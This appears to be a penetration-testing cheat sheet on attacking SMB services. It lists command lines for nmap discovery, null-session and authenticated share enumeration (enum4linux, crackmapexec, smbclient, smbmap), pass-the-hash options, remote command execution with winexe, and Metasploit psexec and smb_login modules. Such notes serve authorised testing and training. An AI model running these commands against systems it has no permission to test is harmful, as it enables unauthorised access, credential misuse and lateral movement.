Smb

Nmap discovery

Nmap can be used to identify hosts running SMB service

nmap -p 445 10.10.5.0/24
nmap -p 445 --script=smb-protocols 10.10.5.0/24

Mount a shared folder

mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share

module: auxiliary/scanner/smb/smb_login

The following methods attempt to initiate a null session, require no username or password

enum4linux 10.10.5.15


crackmapexec smb <IP> -u '' -p '' --shares


# list the shares
smbclient -L \\\\10.10.15.5
smbcleint -N -L \\\\10.10.15.5

# browse the shares
smbclient \\\\10.10.15.5\\share_name
smbclient -N \\\\10.10.15.15\\share_name


smbmap -H <IP> [-P <PORT>]

The following methods require a username and password

winexe

This method will get command execution

winexe -U administrator%alice_123321 //10.4.16.28 'whoami'

These methods will enumerate shares


#If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> 

#Guest user
crackmapexec smb <IP> -u 'username' -p 'password' --shares 
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares 

smbmap -u "username" -p "password" -H <IP> [-P <PORT>] #Creds
smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash
#List with smbmap, without folder it list everything
smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive list
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash

PSExec

PSExec with Metasploit

module: exploit/windows/smb/psexec

Smb